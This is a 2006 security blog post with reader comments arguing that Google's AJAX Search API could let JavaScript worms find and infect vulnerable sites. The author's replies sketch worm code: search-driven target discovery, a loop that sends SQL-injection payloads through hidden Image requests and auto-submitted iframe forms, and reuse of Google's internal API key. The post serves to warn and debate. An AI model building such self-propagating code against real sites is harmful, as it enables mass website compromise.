Google Search API Worms

Thu, 14 Sep 2006 10:17:52 GMT
by pdp

One of the main disadvantages of AJAX is the lack of cross domain request capabilities. In simple words, a web object from one site cannot access another one from a different site. The reason for this security feature is hidden deeply inside every modern browser security sandbox which is responsible for keeping your personal information private and safe.

Unfortunately, with the rise of AJAX enabled application the need to break out the security sandbox receives a lot of enthusiastic support among AJAX developers. Even Google, one of the biggest AJAX evangelist today, provides JavaScript APIs to allow developers to mashup their services with Google's enormous computing capabilities. As a result Google unconsciously enables various types of worms to craw and exploit the web.

The service that concerns me the most is Google AJAX Search API, the new JavaScript powered search widget. In this article I will cover how to mashup with Google's new service in a very simple way and explain why and how it can be used by web malware to propagate. The source code provided in this article will be available in the next AttackAPI 0.7 release.

First of all it is essential to understand how to use the API. The technique is quite simple actually. It involves the usage of a SCRIPT element which carries a request to Google the JSON way. For example:

<script>
  function myCallback(a, b, c, d) {
    alert(b.results[0].title);
  }
</script>
<script src="http://www.google.com/uds/GblogSearch?callback=myCallback&context=0&lstkp=0&rsz=small&hl=en&q=Google&key=internal-documentation&v=0.1" src="text/javascript"></script>

Upon execution the code above returns the title of the first section from the result set and displays it in an alert box. The reader may expand on that technique.

Going back to my example, the entire logic is carried by the SCRIPT element. There are several important bits in the SCRIPT URL that need to be understood. The first one is the callback field. This is the name of the function that handles the request. The second important field is the key. Google has flexible system where keys are issued per URL. In this example the key is the generic one that can be found in all examples from Google. The last important bit is the actual query. This holds the terms that will be evaluated by Google. When loaded by the browser the SCRIPT element evaluates the content pointed by the URL in its src attribute. This results in a function call to the callback.

That is all that is required in order to make Google queries via JavaScript. There is a minor restriction introduced by Google though. There is no way to go deeper into the result set. Google will give you only the results that it believes are the most interesting and nothing more. However, this restriction can be easily circumvented by introducing diversity in the query terms. For example "intranet ext:aspx", "admin ext:aspx" and "aspx ext:asxp" produce different results and they all refer to *.aspx files. So by using query fuzzer which randomizes the search phrase more results can be extracted.

Knowing how to use Google AJAX Search API is only one side of the story. The other one and probably the most interesting one is how this can be used by web worms. Let's have a look at a couple of examples.

Web worms can use Google's infrastructure to propagate. If a malicious mind finds a vulnerability in WordPress for example and this vulnerability allows SQL Injection, a worm may be written to craw blogs in search for this vulnerability and embed itself into everything that is vulnerable. Once a user visits an infected blog the worm starts another cycle.

Another worm might be able to craw random sites and run generic Cross-site Scripting and SQL Injection checks and send the results to their master who will use them to release more advanced worms.

Malicious minds can use Google technology and recently discovered vulnerabilities to create a BotNet that can be used for computational tasks, attacks, information gathering and pretty much everything else that the masters can come up with.

Unfortunately, I am just the messenger. Although I am not aware of any worms available that make use of this technique I won't be surprised if I see some in the near future. Malicious content in Web Pages, Flash and QuickTime and PDF has suddenly become one of the most common threats we face today.

In my mind I picture a protection system similar to what we have with today's AntiVirus agents; a signature scanner that goes through every page we visit. A Firefox extension that can do that can be quite handy.

Archived Comments

Deryck HodgeDeryck Hodge
So what is the actual security threat? Just being able to search Google for Wordpress blogs if they were vulnerable is not a threat. You can do that a la normal Google search or via the SOAP search API, too. Seems like much ado about nothing to me here.
pdppdp
The threat is that this can be done from JavaScript without the need of a request proxy. This enables worms such as the Samy and Yamaner to infect not only the platform they were written for but other platforms as well. By using Google's AJAX Search API, malicious JavaScript code can discover potential targets and exploit them. I believe that this is a threat.
Deryck HodgeDeryck Hodge
I'm sorry, but I still don't see it. You say the threat is that "*this* can be done from JavaScript". What is the "this"? Searching Google? So just searching Google via JavaScript is a threat? How? How can a worm propogate via a search query? If I'm misunderstanding you, please forgive.
JDJD
The Sammy worm was able to propogate through myspace because it was embedded in a page that ran from the same domain as the target (i.e. another myspace page.) So the security restrictions against cross site scripting were not overcome, they were simply not relevent. In the example you outline, malicious code would be able to search for vulnerabilities, for instance in wordpress. But when it comes to attacking these resources, the script would still have be able to make an attack on a different domain, (such as the domain hosting the blog.) It would not be able to do this, because of the security sandbox. The ability of a piece of malicious code to do a search and find a vulnerability doesn't mean that it can be exploit it. And running a search on a domain through google (which is all that "Google's infrastructure" allows you to do through the api) will have no actual effect on that domain, so Google have not opened up a security hole here.
pdppdp
JD and Deryck, I think that you guys don't understand that making POST and GET requests from JavaScript is quite simple. For example, let's make a GET request.
Let's make a POST request.
<form name="postform" method="POST" action="http://vulnerable.com">
  <input type="hidden" name="params" value="sql_injection_here"/>
  <input tyoe="submit"/>
</form>
<script>
  postform.submit();
</script>
Put that into an iframe and than you can make the request. So, how hard is that? JD made a very good point. There is a security restriction, so, although I can make POST and GET requests I cannot see the result. But worms are usually not interested in that. They can search for targets and blindly exploit them. Because in theory JavaScript cannot read information that is coming from a different DOMAIN, it is hard for worms such as Samy and Yamaner to discover targets outside of their own. However, this restriction is bypassed by using the Google Search API which provides every AJAX developer with programable search facilities. Now worms can discover targets outside of their current DOMAIN and exploit them.
JDJD
I see, everything makes sense now. Of course, the worm doesn't have to see the response, it just moves on to the next target etc. Very nasty. In this case, the yahoo search api is also a threat, as it also has the possibility of working via JSON. Also, I believe that google are more on the ball when it comes to blocking url searches that expose weaknesses than yahoo are (they often return a message like "a virus is running searches from your machine" or something like that), which is another reason why a worm might make use of the yahoo api.
srvzrosrvzro
But searching Google has been used many times to find victims for various types of dynamic websites. This now makes self propagation easier. Imagine everytime a compramised page is visited, the worm searches google api and attempts to infect a different victim. While reviewing the weblogs to one of my sites, I found a curious GET / POST activity and when I checked deeper I found a Google referrer link that tried to use an SQL injection exploit for phpBB forums. I'll add the geocities site here for everyone's review. I've tried to contact geocities' abuse information, but its been several months now and this site is still up. http://geocities.com/oase_peace/
Deryck HodgeDeryck Hodge
Dude, you insult me by saying I don't understand that POST and GET is possible via JavaScript. Please. But so what? In your last examples, I don't even need JavaScript. Just do the GET or POST directly on the vulnerable site. And again, it's the *site* that's vulnerable not Google's API. And your argument that Google's API could someone propogate worms that take advantage of a group of sites' vulnerabilities is hypothetical at best. Show me the code. Prove it. I don't mean to be harsh, but you're the one who posted this to a set of security lists. So back it up. And honestly, it just plain bothers me when people decry the security risk of running JavaScript when there's nothing there. JavaScript has been used to cause problems in the past and will so again, I'm sure, but please don't scream foul when there's nothing there.
pdppdp
JD, good point. I am working on the Yahoo Search API already. srvzro, yes Google has been used for that purpose many times in the past but never from JavaScript. The thing that attacked your website looks to me like the technique used several years ago where you can make Google hack into pages on behalf of the attacker. All the attacker needs to do is to place several links on a page and wait for Google to craw them. This is still possible today. Deryck, my respond wasn't meant to insult you in any way. I was trying to make a point. Did I ever say that Google Search API is vulnerable? Nope, I don't think so. Google search API is not vulnerable, however it provides facilities that can be used by JavaScript worms to propagate. I am sorry Deryck but I am not planning to write a JavaScript worm just to prove my point. Go to AttackAPI project page and write one yourself, or maybe you can prove me wrong by presenting at least 3 points why Google Search API CANNOT be used by JavaScript worms. :) Are you really saying that Google Search API cannot be used by JavaScript worms? Seriously, how many worms were written in the past that were making use of Google search facilities? Yes, they all were written in Perl and C. Now this search facility is brought to JavaScript as well. Is it so hard to understand that this can be used in a malicious way? This respond wasn't meant to insult you or flame you but to prove my point. You are the only guy I know who is claiming that Google Search API is not a threat. My post to FD was meant to send a message, a security notice if you like. We fight against all sorts of malware and those written in JavaScript will be the ones that are harder detect and remove.
Deryck HodgeDeryck Hodge
Believe me, I'm not mad. And I don't mean to continue what seems a pointless debate. I believe you are as stubborn as I am. :-) However, I don't think it's accurate to say I'm the only one disagreeing with you. I'm the only one on this blog saying this, and there's only three of us here. And in fact, I'm *not* disputting that you could use a search engine to discover information about websites and use that info to exploit vunerable sites. I'm disputing that a JavaScript API makes this any more possible than any other programming language or API, or even using Google itself "by hand" so to speak. And I also question your example. If I run the JavaScript search API on my site, and I use it to find info about a site -- that info is in JavaScript object or variables in my browser. Okay, so I've got a list of urls that I believe are vulnerable. Now what? I can't use XMLHttpRequest to do anything with those URLs from my site. I can't use an iframe. I'd have to navigate to that site either directly or via document.location.href manipulation, and by that point, I'm just executing a regular GET or POST. And any info I had in JavaScript form is lost, unless I used some server-side programming to persist it. You seem to be suggesting that the API allows me to traverse the web in some way. If it did, that would be a bug either in the API or the browser and a security risk. I'm saying you haven't proved this is possible. I may be stubborn, but I'm offering technical examples here. Show me something different, and I promise I'll admit I'm wrong and go away.
pdppdp
You are right that you cannot use XMLHttpRequest. You are wrong about the iframe though. You don't need server side language to persist what so ever. Let's say the user has just visited a web page that contains malicious code; a worm if you like. The first thing the worm will do is to perform some malicious activity. Let's say that this is a harmless worm and it is designed to annoy the user. So here is the first piece of code.
<script>
  alert('this page has been compromised by a worm');
</script>
The next thing the worm will do is to find other vulnerable targets to exploit. The worm uses Google AJAX Search API for that purpose.
<script>
  function callback(results) {
    ...
    ...
    ...
  }
  AttackAPI.GoogleSearch.search(callback, query);
</script>
What the callback function does is to handle the results provided by Google AJAX Search API. So let's say that 10 vulnerable applications are found:
  1. http://www.example.com/app
  2. http://www.bla.com/path/to/app
  3. ...
  4. ...
  5. ...
  6. ...
  7. http://www.alabala.com/hidden/path/to/app
  8. ...
  9. ...
  10. ...
The worm takes the results and puts them into a loop that infects all of them with new copies of itself.
<script>
  for (var index = 0; index < URLs.length; index++)
    infect(URLs[index]);
</script>
What the infect function does is to send a POST or GET request, NOT VIA XMLHttpRequest, to the vulnerable target. Let's say that in the first scenario we need to send a GET request. How do we do that bypassing the browser security sandbox?
<script>
function infect(URL) {
  var img = new Image();
  img.src = URL + '?var1=[sql_injection put a javascript payload here]';
}
</script>
Since var1 is vulnerable to SQL Injection when the Image object tries to fetch an IMAGE (MAKE a GET request) a JavaScript payload is sent to the vulnerable APP. Let's say that this request results in JavaScript code injection into the top blog entry. This means that users accessing the attacked website will come across the same worm and the cycle will restart. Let's say that instead of GET a POST is needed. So how do we do that? We don't want to redirect the user, do we? The solution is very simple:
  1. Make a hidden iframe
  2. Make a form inside setting its method to POST
  3. Make a field and set its name to var1 and its value to [sql_injection put a javascript payload here]
  4. Call form submit() method.
Upon execution the iframe will redirect to the URL to which the POST is made. Since it is hidden the user cannot see what is happening in the background. Again, the actual redirection after submitting the form happens inside an iframe, not in the current document. I am not going to present source code how to do that in practice... it will be a bit longer than the first example. However please go ahead an read on this topic and it will get a lot clearer. Research Cross-site request forgery. If Google AJAX Search API wasn't there on first place, the worm propagation would not be possible simply because JavaScript is not able to read content that does not successfully passes the same origin checks. This means that a worm can propagate only on resources that matches the current protocol, domain and port. Thanks for your stubborness :). I believe that the situations is a lot clearer now for the readers of this blog.
Deryck HodgeDeryck Hodge
Thanks for the detailed example. That's all I wanted, not an actual worm. And no, I'm not doing anything stupid. :-) Feel free to Google my name, and I'll think you'll find I have a solid history of building websites and web tools, not exploiting weak ones. As for your example, it's clearer now what you mean, but really just more of what you said earlier. I don't know how to make my argument any clearer. Your just illustrating classic XSS -- 1) Find a list of vulnerable sites 2) Insert malicious JavaScript 3) Rinse and repeat :-) The vulnerability is with the site(s) you discover, not the API. So how does being able to search for the list of sites via JavaScript pose any more of a threat than being able to search for vulnerable sites by more "traditional" means? That's all I'm suggesting... that this is a hypothetical case, and not a real threat to very many, if anyone. It depends on a) an already existing vulnerablility, and b) those vulnerable sites to be running the Google search API. I hope my point, like yours, in now clear. I don't want to take up more of your blog than I already have (and I appreciate your discussion.) Feel free to take this off list with me -- deryck AT samba DOT org -- if you want to discuss further.
pdppdp
No worries mate. Deryck, actually I am glad that we had this discussion. You are right that this is a classical example of a worm and by nature is not any different. However, what is different about Google AJAX Search API Worms is that they are written in JavaScript. Yes, there are other worms written in JavaScript but they were all restricted to the same SITE/DOMAIN. As I said earlier I am just the messenger. There are no available solutions right now to fight against this kind of worms. Moreover, JavaScript is quite powerful language which allows code to morph which makes detection quite hard. There is one more thing that I would like to make clear as well. You are saying there are two requirements for such worms.
a) an already existing vulnerablility, and b) those vulnerable sites to be running the Google search API.
You are right for the first one but not for the second one. :) Thanks for you comments.
Blad3Blad3
Hey, I finally got it also :P Thanks Deryck Hodge. Sometimes, stubborness is a quality.
bedobedo
In my mind I picture a protection system >similar to what we have with today’s >AntiVirus agents; a signature scanner that goes through every page we visit. A Firefox >extension that can do that can be quite handy.
Interesting as they are getting Browser Shield for IE into life sooner. Although they claim to prevent the "malicious content" (0 day or unpatched exploits for IE) in web sites, this may also mean "javascript malware", as they put it nowadays. So, that means that the effort to write a tool is worthed. After all, this is not about writing a solid browser, or is it? Nice work.
chownchown
You guys are missing something. I'm not sure about IE, but Firefox certainly doesn't allow scripts to access iframes. And also, you seem to be relying on some extremely abundant SQL injection vulnerability. Not only that, but the ability to exploit it - with javascript. SQL injection is pretty much impossible to automate.
chownchown
"SQL injection vulnerability can be exploited with a single URL." That's not possible. You cannot exploit multiple different vulnerabilities with a single attack. Nearly all databases are completely different, and saying you can gain access to any database with a single URL is quite simply ludicrous. Believe me, if it were at all possible, in any way, shape or form, to create an effective Javascript worm - one that could effect multiple domains, it would have been done a long time ago.
pdppdp
Ok, let’s imagine that there is popular blogging software that is vulnerable to SQL Injection. The vulnerability occurs when SQL meta characters are submitted into an unsanitized hidden field from a submit comments form. In that respect if someone inputs single quote into this field, the resulting page will be an error dump. Is it possible for a JavaScript worm to propagate via this vulnerability? I am saying that it is absolutely possible. Let's have a look in the test scenario specified above. The worm can enumerate blogs by using Google AJAX Search API. Once the blog is found the worm will blindly submit a comment with special SQL statements inside to tamper the backend database. This can be quite simple or complex depending how the application is written. The worm is spreading! :) Yey! How do we submit comments you may ask? The answer is via GET and POST. Can JavaScript applications do blind GET and POST? Yes! Some blogging software accept only POST, others accept both. If it is a Java Servlet application there is high chance for the second. But this doesn’t matter. Both GET and POST can be performed from JavaScript. Not to mention that the entire process can be automated absolutely 100% because the application is known and its behavior can be studied in order to make the worm more stable.
atomic1fireatomic1fire
idiot style: worm sees hole worm uses google to find more copys of that hole
patopato
If a browser sandbox doesn’t allow to obtain data from a different domain, how can any site show dynamic google content? How does Google AJAX API works? Isn’t it using XMLHTTP?
pdppdp
Google AJAX Search API works with SCRIPT elements. This technique is also known as JavaScript on demand or JSON. Basically, a dynamic SCRIPT element is created that points to a remote URL which upon visit generates JavaScript that is evaluated inside the current browser. Since there are no restrictions on SCRIPT elements, this mechanism is quite suitable for implementing cross-domain functionalities.
wasnewbiewasnewbie
I wonder if XSS on victim sites have to be persistent XSS types in order for this worm to spread on a much larger scale.
pdppdp
wasnewbie, persistency is definitely a big plus. However, worms that abuse Google AJAX Search API can use some sort of semi persistent method with dynamically generated MOV, MP3 or SWF objects through the method I discussed here. For example the worm can generate dynamic SWF that mimics Google Video or YouTube video player. After the movie is previewed the user will be asked to share the object with others or blog it on their website. I know that it requires user interaction but let's me honest, people will happily do what they are asked for.
TomTom
A lot of Joomla sites were compromised by a series of attacks lately. Using GET/POST methods. It wasn't Joomla actually - it was several 3rd party components for the popular CMS. My point is...I do believe that a single attack can effect multiple sites...or let's say a single attack running over and over automated. Someone just unleashes it and it crawls the web like a search engine finding vulnerable sites... however to the point of chown, it has to be the SAME EXACTLY circumstance... To the point of pdp, that's not really all too uncommon - especially because of the one example I just made about the CMS. All this means is developers need to be more careful. Generally speaking - the worm that would run SQL injection is probably easier to cut off at the head than other attacks...because a pattern can VERY easily be established and developers can fix the problem. Hopefully no one is using a compromised application for anything important such as payment transactions, etc. ...if there was a vulnerability with say a paypal site and someone was able to inject some SQL to change around where money is being sent... Well not hard to catch the person but WOW what a mess. There is a big potential for disaster, but it's not a reason to not use Google's APIs. It's just you need to understand you are advertising your system to the world...which many people want to do anyway- we all want more web traffic...just not the malicious kind. Of course google's code search also presents dangers too. Though I'm sure that takes more of a manual labored approach for the script kiddies...where's the fun in that?
anyoneanyone
hi, thankx for the useful info :)
Computer Security TipsComputer Security Tips
Computer Security Tips... I couldn't understand some parts of this article, but it sounds interesting...
TruePathTruePath
So I have to admit still being confused. Are you advocating that client side scripting languages be denied *ANY* means of retrieving search data? After all the way you stated your example it doesn't matter in the slightest how the JS gets the information so the only way to protect against this would be to deny ANY kind of google query from JS (or require user input or something). I agree the ability to get search results makes JS worms slightly more dangerous but only slightly. After all the author of the worm could merely release 50-100 worms into the wild each of them containing their own subset of compressed search queries (does search beforehand). Additionally I would thin the API key would prevent this sort of attack from going very far. If you are trying to run this as a worm you will need a new API key for every domain you infect no? (And if somehow you can use the same one won't google notice and shut you down?). I suppose there is some chance you could try to grab the API key from the website you are attacking if it has one but that sounds mega-hard and less efficient than just preloading the data. Moreover, if you have a server vulnerable to an SQL injection attack discoverable via google any number of baddies can attack it directly so the extra risk seems like not much to worry about.
pdppdp
TruePath, you have some valid point here although I believe that this is just the beginning of the exploration. The more versatile AJAX technology become the more often it will be used for malicious activities. P.S. you can use Google's own internal key. They use that key for all their examples. That one works everywhere on every domain.
TruePathTruePath
Ahh, I stand corrected on the key point. Thanks for letting me know.
Mr-YellowMr-Yellow
Problem: The results returned on each interation are the same results, no viral spread. The worm would have to integrate new keywords into it's search on each new target so as to get a fresh set of targets. While the point of it's search is looking for specifically exploitable paths/signatures. Additional keywords could be used to limit down results and get some fresh URLs but not easily. JSON makes this a little easier but isn't something that was impossible before. Hitting pages and parsing results from HTML response is exactly the same as hitting some XML and parsing that, just a little more code.
Martien de JongMartien de Jong
I have seen code like this in action, the result is pretty devastating. Anyway, I think the fault is not Google's. Website just should not have vulnerabilities. If you have a dark room with all your belongings in it, will you blame someone that hands you a flashlight?
Peter TeohPeter Teoh
You are absolutely right that a worm is possible to be constructed. One solution is characterizing and fingerprinting every possible URL (limiting to first few words) that can enter into the system, and thus any anomalous URL constructed that attempt to enter the system will be subjected to additional checks/filtering/sandboxing or whatever have u. Normally server side should not have originating outgoing traffic to the internet - if it started another HTTP request at port 80 to another server, then perhaps it propagation is always possible. But I am thinking - even if originating outgoing traffic is banned, the server (assuming XSS-compromised attack) can always initiate a client-side HTTP refresh mechanism to attack another server, thus indirectly propagating from one server to another server nevertheless, correct?